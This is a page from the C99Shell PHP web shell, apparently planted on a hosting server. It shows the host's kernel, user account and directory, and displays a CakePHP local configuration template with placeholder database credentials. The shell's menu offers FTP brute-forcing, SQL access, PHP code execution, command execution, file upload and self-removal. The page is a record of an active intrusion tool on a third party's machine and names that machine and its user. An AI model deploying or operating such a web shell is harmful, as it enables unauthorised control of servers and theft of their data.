!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/cake/   drwxr-xr-x
Free 293.62 GB of 429.69 GB (68.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     app_local.php (2.79 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Local configuration file to provide any overrides to your app.php configuration.
 * Copy and save this file as app_local.php and make changes as required.
 * Note: It is not recommended to commit files with credentials such as app_local.php
 * into source code version control.
 */
return [
    
/*
     * Debug Level:
     *
     * Production Mode:
     * false: No error messages, errors, or warnings shown.
     *
     * Development Mode:
     * true: Errors and warnings shown.
     */
    
'debug' => filter_var(env('DEBUG'true), FILTER_VALIDATE_BOOLEAN),

    
/*
     * Security and encryption configuration
     *
     * - salt - A random string used in security hashing methods.
     *   The salt value is also used as the encryption key.
     *   You should treat it as extremely sensitive data.
     */
    
'Security' => [
        
'salt' => env('SECURITY_SALT''[[salt]]'),
    ],

    
/*
     * Connection information used by the ORM to connect
     * to your application's datastores.
     *
     * See app.php for more configuration options.
     */
    
'Datasources' => [
        
'default' => [
            
'host' => '[[softdbhost]]',
            
/*
             * CakePHP will use the default DB port based on the driver selected
             * MySQL on MAMP uses port 8889, MAMP users will want to uncomment
             * the following line and set the port accordingly
             */
            //'port' => 'non_standard_port_number',

            
'username' => '[[softdbuser]]',
            
'password' => '[[softdbpass]]',

            
'database' => '[[softdb]]',
            
/*
             * If not using the default 'public' schema with the PostgreSQL driver
             * set it here.
             */
            //'schema' => 'myapp',

            /*
             * You can use a DSN string to set the entire configuration
             */
            
'url' => env('DATABASE_URL'null),
        ],

        
/*
         * The test connection is used during the test suite.
         */
        
'test' => [
            
'host' => 'localhost',
            
//'port' => 'non_standard_port_number',
            
'username' => 'my_app',
            
'password' => 'secret',
            
'database' => 'test_myapp',
            
//'schema' => 'myapp',
            
'url' => env('DATABASE_TEST_URL''sqlite://127.0.0.1/tmp/tests.sqlite'),
        ],
    ],

    
/*
     * Email configuration.
     *
     * Host and credential configuration in case you are using SmtpTransport
     *
     * See app.php for more configuration options.
     */
    
'EmailTransport' => [
        
'default' => [
            
'host' => 'localhost',
            
'port' => 25,
            
'username' => null,
            
'password' => null,
            
'client' => null,
            
'url' => env('EMAIL_TRANSPORT_DEFAULT_URL'null),
        ],
    ],
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0962 ]--